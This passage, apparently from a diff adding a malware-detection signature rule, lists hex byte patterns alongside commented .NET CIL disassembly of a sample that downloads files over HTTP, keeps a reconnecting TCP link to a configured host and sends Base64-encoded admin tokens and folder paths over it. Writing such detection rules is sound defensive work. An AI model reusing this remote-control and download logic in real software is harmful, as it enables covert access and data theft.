28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0D 09 08 8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 18 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1F ?? 9C 11 ?? 17 1F ?? 9C 11 ?? 6F ?? ?? ?? ?? 26 07 28 ?? ?? ?? ?? 1F ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 18 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1F ?? 9C 11 ?? 17 1F ?? 9C 11 ?? 6F ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 1F ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 1F ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 16 6A 13 ?? 11 ?? 11 ?? 8E 69 6A 58 13 ?? 04 6F ?? ?? ?? ?? 13 ?? 2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 18 6A 58 13 ?? 11 ?? 11 ?? 8E 69 6A 58 13 ?? 11 ?? 18 6A 58 13 ?? 11 ?? 11 ?? 8E 69 6A 58 13 ?? 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 
DC 05 6F ?? ?? ?? ?? 13 ?? 2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 7B ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 18 6A 58 13 ?? 11 ?? 11 ?? 8E 69 6A 58 13 ?? 11 ?? 7B ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 58 13 ?? 11 ?? 18 6A 58 13 ?? 11 ?? 11 ?? 8E 69 6A 58 13 ?? 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 11 ?? 18 6A 58 13 ?? 11 ?? 18 6A 58 13 ?? 07 11 ?? 6F ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 04 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 18 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1F ?? 9C 11 ?? 17 1F ?? 9C 11 ?? 16 18 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11 ?? 18 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1F ?? 9C 11 ?? 17 1F ?? 9C 11 ?? 16 18 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 05 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 7B ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 18 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1F ?? 9C 11 ?? 17 1F ?? 9C 11 ?? 16 18 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 19 17 73 ?? ?? ?? ?? 13 ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 13 ?? 11 ?? 16 30 ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 18 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1F ?? 9C 11 ?? 17 1F ?? 9C 11 ?? 16 18 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 11 ?? 18 8D ?? ?? 
?? ?? 13 ?? 11 ?? 16 1F ?? 9C 11 ?? 17 1F ?? 9C 11 ?? 16 18 6F ?? ?? ?? ?? 11 ?? 18 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1F ?? 9C 11 ?? 17 1F ?? 9C 11 ?? 16 18 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 74 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 0A 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? DE ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? DE ?? 26 DE ?? 06 2A } + /* +function WebDL.WebDL::_down1 0x0600009b@1c444ebeba24dcba8628b7dfe5fec7c6 with 6 features: + - check if file exists + - create HTTP request + - manipulate console buffer + - receive HTTP response + - send HTTP request + - send data + 3144 72 01 00 00 70 ldstr "" + 3149 0a stloc.0 + 314A 02 ldarg.0 + 314B 04 ldarg.2 + 314C 28 99 00 00 06 call _getName + 3151 0b stloc.1 + 3152 07 ldloc.1 + 3153 72 01 00 00 70 ldstr "" + 3158 28 bd 00 00 0a call System.String::op_Equality + 315D 2c 08 brfalse.s 0x3167 + 315F 06 ldloc.0 + 3160 13 0a stloc.s local(0x000A) + 3162 dd c3 00 00 00 leave 0x322a + 3167 03 ldarg.1 + 3168 07 ldloc.1 + 3169 28 60 00 00 0a call System.IO.Path::Combine + 316E 0c stloc.2 + 316F 08 ldloc.2 + 3170 28 be 00 00 0a call System.Console::WriteLine + 3175 17 ldc.i4.1 + 3176 0d stloc.3 + 3177 2b 1c br.s 0x3195 + 3179 03 ldarg.1 + 317A 09 ldloc.3 + 317B 8c 32 00 00 01 box System.Int32 + 3180 72 13 02 00 70 ldstr "_" + 3185 07 ldloc.1 + 3186 28 28 00 00 0a call System.String::Concat + 318B 28 60 00 00 0a call System.IO.Path::Combine + 3190 0c stloc.2 + 3191 09 ldloc.3 + 3192 17 ldc.i4.1 + 3193 58 add + 3194 0d stloc.3 + 3195 08 ldloc.2 + 3196 28 bf 00 00 0a call System.IO.File::Exists + 319B 2d dc brtrue.s 0x3179 + 319D 08 ldloc.2 + 319E 28 c0 00 00 0a call System.IO.File::OpenWrite + 31A3 13 04 stloc.s local(0x0004) + 31A5 20 00 00 10 00 ldc.i4 0x100000 + 31AA 8d 3d 00 00 01 newarr System.Byte + 31AF 13 05 stloc.s local(0x0005) + 31B1 04 ldarg.2 + 31B2 28 97 00 00 0a call 
System.Net.WebRequest::Create + 31B7 75 58 00 00 01 isinst System.Net.HttpWebRequest + 31BC 13 06 stloc.s local(0x0006) + 31BE 11 06 ldloc.s local(0x0006) + 31C0 6f b3 00 00 0a callvirt System.Net.WebRequest::GetResponse + 31C5 75 67 00 00 01 isinst System.Net.HttpWebResponse + 31CA 13 07 stloc.s local(0x0007) + 31CC 11 07 ldloc.s local(0x0007) + 31CE 6f b4 00 00 0a callvirt System.Net.WebResponse::GetResponseStream + 31D3 13 08 stloc.s local(0x0008) + 31D5 11 08 ldloc.s local(0x0008) + 31D7 11 05 ldloc.s local(0x0005) + 31D9 16 ldc.i4.0 + 31DA 11 05 ldloc.s local(0x0005) + 31DC 8e ldlen + 31DD 69 conv.i4 + 31DE 6f 84 00 00 0a callvirt System.IO.Stream::Read + 31E3 13 09 stloc.s local(0x0009) + 31E5 2b 1c br.s 0x3203 + 31E7 11 04 ldloc.s local(0x0004) + 31E9 11 05 ldloc.s local(0x0005) + 31EB 16 ldc.i4.0 + 31EC 11 09 ldloc.s local(0x0009) + 31EE 6f 89 00 00 0a callvirt System.IO.Stream::Write + 31F3 11 08 ldloc.s local(0x0008) + 31F5 11 05 ldloc.s local(0x0005) + 31F7 16 ldc.i4.0 + 31F8 11 05 ldloc.s local(0x0005) + 31FA 8e ldlen + 31FB 69 conv.i4 + 31FC 6f 84 00 00 0a callvirt System.IO.Stream::Read + 3201 13 09 stloc.s local(0x0009) + 3203 11 09 ldloc.s local(0x0009) + 3205 16 ldc.i4.0 + 3206 30 df bgt.s 0x31e7 + 3208 11 08 ldloc.s local(0x0008) + 320A 6f b2 00 00 0a callvirt System.IO.Stream::Close + 320F 11 07 ldloc.s local(0x0007) + 3211 6f b8 00 00 0a callvirt System.Net.WebResponse::Close + 3216 11 04 ldloc.s local(0x0004) + 3218 6f b2 00 00 0a callvirt System.IO.Stream::Close + 321D 72 17 02 00 70 ldstr "OK" + 3222 0a stloc.0 + 3223 de 03 leave.s 0x3228 + 3225 26 pop + 3226 de 00 leave.s 0x3228 + 3228 06 ldloc.0 + 3229 2a ret + 322A 11 0a ldloc.s local(0x000A) + 322C 2a ret + */ + $c3 = { 72 ?? ?? ?? ?? 0A 02 04 28 ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 06 13 ?? DD ?? ?? ?? ?? 03 07 28 ?? ?? ?? ?? 0C 08 28 ?? ?? ?? ?? 17 0D 2B ?? 03 09 8C ?? ?? ?? ?? 72 ?? ?? ?? ?? 07 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 09 17 58 0D 08 28 ?? ?? ?? ?? 2D ?? 
08 28 ?? ?? ?? ?? 13 ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 04 28 ?? ?? ?? ?? 75 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 75 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 13 ?? 11 ?? 16 30 ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 0A DE ?? 26 DE ?? 06 2A 11 ?? 2A } + /* +function Sockets.MySocket::<.ctor>b__0 0x0600008a@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - act as TCP client + 2394 20 f4 01 00 00 ldc.i4 0x1f4 + 2399 28 6a 00 00 0a call System.Threading.Thread::Sleep + 239E 20 00 00 a0 00 ldc.i4 0xa00000 + 23A3 8d 3d 00 00 01 newarr System.Byte + 23A8 0a stloc.0 + 23A9 38 11 01 00 00 br 0x24bf + 23AE 02 ldarg.0 + 23AF 7b 8a 00 00 04 ldfld _tcpClient + 23B4 3a 9d 00 00 00 brtrue 0x2456 + 23B9 02 ldarg.0 + 23BA 73 7d 00 00 0a newobj System.Net.Sockets.TcpClient::.ctor + 23BF 7d 8a 00 00 04 stfld _tcpClient + 23C4 02 ldarg.0 + 23C5 7b 8a 00 00 04 ldfld _tcpClient + 23CA 20 00 00 a0 00 ldc.i4 0xa00000 + 23CF 6f 7e 00 00 0a callvirt System.Net.Sockets.TcpClient::set_SendBufferSize + 23D4 02 ldarg.0 + 23D5 7b 8a 00 00 04 ldfld _tcpClient + 23DA 20 00 00 a0 00 ldc.i4 0xa00000 + 23DF 6f 7f 00 00 0a callvirt System.Net.Sockets.TcpClient::set_ReceiveBufferSize + 23E4 02 ldarg.0 + 23E5 7b 8a 00 00 04 ldfld _tcpClient + 23EA 02 ldarg.0 + 23EB 7b 8e 00 00 04 ldfld __host + 23F0 02 ldarg.0 + 23F1 7b 8f 00 00 04 ldfld __port + 23F6 6f 80 00 00 0a callvirt System.Net.Sockets.TcpClient::Connect + 23FB 02 ldarg.0 + 23FC 02 ldarg.0 + 23FD 7b 8a 00 00 04 ldfld _tcpClient + 2402 6f 81 00 00 0a callvirt System.Net.Sockets.TcpClient::GetStream + 2407 7d 8b 00 00 04 stfld _networkStream + 240C 02 ldarg.0 + 240D 17 ldc.i4.1 + 240E 7d 89 00 00 04 stfld isConnected + 2413 02 ldarg.0 + 2414 7b 90 00 00 04 ldfld onConnected + 2419 2c 11 brfalse.s 0x242c + 241B 02 ldarg.0 + 241C 7b 90 00 00 04 ldfld onConnected + 
2421 02 ldarg.0 + 2422 7b 89 00 00 04 ldfld isConnected + 2427 6f 82 00 00 0a callvirt Invoke + 242C de 28 leave.s 0x2456 + 242E 26 pop + 242F 02 ldarg.0 + 2430 16 ldc.i4.0 + 2431 7d 89 00 00 04 stfld isConnected + 2436 02 ldarg.0 + 2437 14 ldnull + 2438 7d 8a 00 00 04 stfld _tcpClient + 243D 02 ldarg.0 + 243E 14 ldnull + 243F 7d 8b 00 00 04 stfld _networkStream + 2444 28 83 00 00 0a call System.GC::Collect + 2449 02 ldarg.0 + 244A 7b 88 00 00 04 ldfld reConnectionDelay + 244F 28 6a 00 00 0a call System.Threading.Thread::Sleep + 2454 de 00 leave.s 0x2456 + 2456 02 ldarg.0 + 2457 7b 8b 00 00 04 ldfld _networkStream + 245C 2c 37 brfalse.s 0x2495 + 245E 02 ldarg.0 + 245F 7b 8b 00 00 04 ldfld _networkStream + 2464 06 ldloc.0 + 2465 16 ldc.i4.0 + 2466 06 ldloc.0 + 2467 8e ldlen + 2468 69 conv.i4 + 2469 6f 84 00 00 0a callvirt System.IO.Stream::Read + 246E 0b stloc.1 + 246F 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2474 06 ldloc.0 + 2475 16 ldc.i4.0 + 2476 07 ldloc.1 + 2477 6f 85 00 00 0a callvirt System.Text.Encoding::GetString + 247C 0c stloc.2 + 247D 07 ldloc.1 + 247E 16 ldc.i4.0 + 247F 31 14 ble.s 0x2495 + 2481 02 ldarg.0 + 2482 7b 91 00 00 04 ldfld onData + 2487 2c 0c brfalse.s 0x2495 + 2489 02 ldarg.0 + 248A 7b 91 00 00 04 ldfld onData + 248F 08 ldloc.2 + 2490 6f 6c 00 00 0a callvirt Invoke + 2495 de 21 leave.s 0x24b8 + 2497 26 pop + 2498 02 ldarg.0 + 2499 14 ldnull + 249A 7d 8a 00 00 04 stfld _tcpClient + 249F 02 ldarg.0 + 24A0 14 ldnull + 24A1 7d 8b 00 00 04 stfld _networkStream + 24A6 28 83 00 00 0a call System.GC::Collect + 24AB 02 ldarg.0 + 24AC 7b 88 00 00 04 ldfld reConnectionDelay + 24B1 28 6a 00 00 0a call System.Threading.Thread::Sleep + 24B6 de 00 leave.s 0x24b8 + 24B8 1f 0a ldc.i4.s 0xa + 24BA 28 6a 00 00 0a call System.Threading.Thread::Sleep + 24BF 02 ldarg.0 + 24C0 7b 8d 00 00 04 ldfld _isRunning + 24C5 3a e4 fe ff ff brtrue 0x23ae + 24CA 2a ret + */ + $c4 = { 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 0A 38 ?? ?? ?? ?? 
02 7B ?? ?? ?? ?? 3A ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 17 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 2C ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 02 16 7D ?? ?? ?? ?? 02 14 7D ?? ?? ?? ?? 02 14 7D ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 02 7B ?? ?? ?? ?? 2C ?? 02 7B ?? ?? ?? ?? 06 16 06 8E 69 6F ?? ?? ?? ?? 0B 28 ?? ?? ?? ?? 06 16 07 6F ?? ?? ?? ?? 0C 07 16 31 ?? 02 7B ?? ?? ?? ?? 2C ?? 02 7B ?? ?? ?? ?? 08 6F ?? ?? ?? ?? DE ?? 26 02 14 7D ?? ?? ?? ?? 02 14 7D ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 1F ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 3A ?? ?? ?? ?? 2A } + /* +function Reqss.Reqss::b__1 0x06000023@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - decode data using Base64 in .NET + 07FA 02 ldarg.0 + 07FB 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 0800 02 ldarg.0 + 0801 7b 9d 00 00 04 ldfld _text1 + 0806 28 47 00 00 0a call System.Convert::FromBase64String + 080B 6f 48 00 00 0a callvirt System.Text.Encoding::GetString + 0810 7d 9d 00 00 04 stfld _text1 + 0815 2a ret + */ + $c5 = { 02 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 
2A } + /* +function test_A1.Form1::b__14 0x0600001b@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - encode data using Base64 + 04D8 02 ldarg.0 + 04D9 7b 23 00 00 04 ldfld mySocket + 04DE 17 ldc.i4.1 + 04DF 8c 32 00 00 01 box System.Int32 + 04E4 72 23 00 00 70 ldstr "|" + 04E9 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 04EE 7e 22 00 00 04 ldsfld _TOKEN_ + 04F3 72 23 00 00 70 ldstr "|" + 04F8 16 ldc.i4.0 + 04F9 8c 32 00 00 01 box System.Int32 + 04FE 28 28 00 00 0a call System.String::Concat + 0503 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 0508 28 2b 00 00 0a call System.Convert::ToBase64String + 050D 28 28 00 00 0a call System.String::Concat + 0512 6f 88 00 00 06 callvirt Send + 0517 26 pop + 0518 2a ret + */ + $c6 = { 02 7B ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 2A } + /* +function Reqss.Reqss::b__6 0x06000028@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - encode data using Base64 + 0884 02 ldarg.0 + 0885 1c ldc.i4.6 + 0886 8d 01 00 00 01 newarr System.Object + 088B 0a stloc.0 + 088C 06 ldloc.0 + 088D 16 ldc.i4.0 + 088E 20 a0 86 01 00 ldc.i4 0x186a0 + 0893 8c 32 00 00 01 box System.Int32 + 0898 a2 stelem.ref + 0899 06 ldloc.0 + 089A 17 ldc.i4.1 + 089B 72 23 00 00 70 ldstr "|" + 08A0 a2 stelem.ref + 08A1 06 ldloc.0 + 08A2 18 ldc.i4.2 + 08A3 02 ldarg.0 + 08A4 7b 98 00 00 04 ldfld _adm_token + 08A9 a2 stelem.ref + 08AA 06 ldloc.0 + 08AB 19 ldc.i4.3 + 08AC 72 23 00 00 70 ldstr "|" + 08B1 a2 stelem.ref + 08B2 06 ldloc.0 + 08B3 1a ldc.i4.4 + 08B4 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 08B9 02 ldarg.0 + 08BA 7b 9e 00 00 04 ldfld _temp_dir1 + 08BF 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 08C4 28 2b 00 00 0a call System.Convert::ToBase64String + 08C9 a2 stelem.ref + 08CA 06 ldloc.0 + 08CB 1b ldc.i4.5 + 08CC 72 23 00 00 70 ldstr "|" + 08D1 a2 stelem.ref + 08D2 06 
ldloc.0 + 08D3 28 49 00 00 0a call System.String::Concat + 08D8 7d 97 00 00 04 stfld _socket_res + 08DD 2a ret + */ + $c7 = { 02 1C 8D ?? ?? ?? ?? 0A 06 16 20 ?? ?? ?? ?? 8C ?? ?? ?? ?? A2 06 17 72 ?? ?? ?? ?? A2 06 18 02 7B ?? ?? ?? ?? A2 06 19 72 ?? ?? ?? ?? A2 06 1A 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 06 1B 72 ?? ?? ?? ?? A2 06 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 2A } + /* +function Reqss.Reqss::b__a 0x0600002c@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - encode data using Base64 + 09B4 02 ldarg.0 + 09B5 25 dup + 09B6 7b 97 00 00 04 ldfld _socket_res + 09BB 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 09C0 02 ldarg.0 + 09C1 7b a1 00 00 04 ldfld _res2 + 09C6 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 09CB 28 2b 00 00 0a call System.Convert::ToBase64String + 09D0 28 50 00 00 0a call System.String::Concat + 09D5 7d 97 00 00 04 stfld _socket_res + 09DA 2a ret + */ + $c8 = { 02 25 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 
2A } + /* +function <>c__DisplayClassa1::b__33 0x060000a0@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - encode data using Base64 + 0F20 1b ldc.i4.5 + 0F21 8d 01 00 00 01 newarr System.Object + 0F26 0b stloc.1 + 0F27 07 ldloc.1 + 0F28 16 ldc.i4.0 + 0F29 20 50 34 03 00 ldc.i4 0x33450 + 0F2E 8c 32 00 00 01 box System.Int32 + 0F33 a2 stelem.ref + 0F34 07 ldloc.1 + 0F35 17 ldc.i4.1 + 0F36 72 23 00 00 70 ldstr "|" + 0F3B a2 stelem.ref + 0F3C 07 ldloc.1 + 0F3D 18 ldc.i4.2 + 0F3E 7e 28 00 00 04 ldsfld _1_shll_ + 0F43 7b 87 00 00 04 ldfld _adm_token + 0F48 a2 stelem.ref + 0F49 07 ldloc.1 + 0F4A 19 ldc.i4.3 + 0F4B 72 23 00 00 70 ldstr "|" + 0F50 a2 stelem.ref + 0F51 07 ldloc.1 + 0F52 1a ldc.i4.4 + 0F53 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 0F58 03 ldarg.1 + 0F59 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 0F5E 28 2b 00 00 0a call System.Convert::ToBase64String + 0F63 a2 stelem.ref + 0F64 07 ldloc.1 + 0F65 28 49 00 00 0a call System.String::Concat + 0F6A 0a stloc.0 + 0F6B 06 ldloc.0 + 0F6C 72 01 00 00 70 ldstr "" + 0F71 28 2c 00 00 0a call System.String::op_Inequality + 0F76 2c 0d brfalse.s 0xf85 + 0F78 02 ldarg.0 + 0F79 7b b0 00 00 04 ldfld mySocket + 0F7E 06 ldloc.0 + 0F7F 6f 88 00 00 06 callvirt Send + 0F84 26 pop + 0F85 2a ret + */ + $c9 = { 1B 8D ?? ?? ?? ?? 0B 07 16 20 ?? ?? ?? ?? 8C ?? ?? ?? ?? A2 07 17 72 ?? ?? ?? ?? A2 07 18 7E ?? ?? ?? ?? 7B ?? ?? ?? ?? A2 07 19 72 ?? ?? ?? ?? A2 07 1A 28 ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 07 28 ?? ?? ?? ?? 0A 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 02 7B ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 
26 2A } + /* +function Funcss.Funcs::CreateMD5 0x0600001d@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - hash data with MD5 + 071C 28 3a 00 00 0a call System.Security.Cryptography.MD5::Create + 0721 0a stloc.0 + 0722 28 3b 00 00 0a call System.Text.Encoding::get_ASCII + 0727 02 ldarg.0 + 0728 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 072D 0b stloc.1 + 072E 06 ldloc.0 + 072F 07 ldloc.1 + 0730 6f 3c 00 00 0a callvirt System.Security.Cryptography.HashAlgorithm::ComputeHash + 0735 0c stloc.2 + 0736 73 3d 00 00 0a newobj System.Text.StringBuilder::.ctor + 073B 0d stloc.3 + 073C 16 ldc.i4.0 + 073D 13 04 stloc.s local(0x0004) + 073F 2b 1f br.s 0x760 + 0741 09 ldloc.3 + 0742 08 ldloc.2 + 0743 11 04 ldloc.s local(0x0004) + 0745 8f 3d 00 00 01 ldelema System.Byte + 074A 72 33 00 00 70 ldstr "x2" + 074F 28 3e 00 00 0a call System.Byte::ToString + 0754 6f 3f 00 00 0a callvirt System.Text.StringBuilder::Append + 0759 26 pop + 075A 11 04 ldloc.s local(0x0004) + 075C 17 ldc.i4.1 + 075D 58 add + 075E 13 04 stloc.s local(0x0004) + 0760 11 04 ldloc.s local(0x0004) + 0762 08 ldloc.2 + 0763 8e ldlen + 0764 69 conv.i4 + 0765 32 da blt.s 0x741 + 0767 09 ldloc.3 + 0768 6f 40 00 00 0a callvirt System.Object::ToString + 076D 13 05 stloc.s local(0x0005) + 076F de 0a leave.s 0x77b + 0771 06 ldloc.0 + 0772 2c 06 brfalse.s 0x77a + 0774 06 ldloc.0 + 0775 6f 2f 00 00 0a callvirt System.IDisposable::Dispose + 077A dc endfinally + 077B 11 05 ldloc.s local(0x0005) + 077D 2a ret + */ + $c10 = { 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 02 6F ?? ?? ?? ?? 0B 06 07 6F ?? ?? ?? ?? 0C 73 ?? ?? ?? ?? 0D 16 13 ?? 2B ?? 09 08 11 ?? 8F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 11 ?? 17 58 13 ?? 11 ?? 08 8E 69 32 ?? 09 6F ?? ?? ?? ?? 13 ?? DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 11 ?? 
2A } + /* +function Reqss.Reqss::b__49 0x06000069@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - get common file path + 12C3 02 ldarg.0 + 12C4 1f 1a ldc.i4.s 0x1a + 12C6 28 5f 00 00 0a call System.Environment::GetFolderPath + 12CB 7d 9e 00 00 04 stfld _temp_dir1 + 12D0 2a ret + */ + $c11 = { 02 1F ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 2A } + /* +function Reqss.Reqss::b__18 0x0600003a@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - create directory + 0BC4 02 ldarg.0 + 0BC5 7b 9e 00 00 04 ldfld _temp_dir1 + 0BCA 28 54 00 00 0a call System.IO.Directory::CreateDirectory + 0BCF 26 pop + 0BD0 de 03 leave.s 0xbd5 + 0BD2 26 pop + 0BD3 de 00 leave.s 0xbd5 + 0BD5 2a ret + */ + $c12 = { 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 DE ?? 26 DE ?? 2A } + /* +function Reqss.Reqss::b__4b 0x0600006b@1c444ebeba24dcba8628b7dfe5fec7c6 with 2 features: + - check if directory exists + - create directory + 12EA 02 ldarg.0 + 12EB 7b 9e 00 00 04 ldfld _temp_dir1 + 12F0 28 61 00 00 0a call System.IO.Directory::Exists + 12F5 2d 0c brtrue.s 0x1303 + 12F7 02 ldarg.0 + 12F8 7b 9e 00 00 04 ldfld _temp_dir1 + 12FD 28 54 00 00 0a call System.IO.Directory::CreateDirectory + 1302 26 pop + 1303 2a 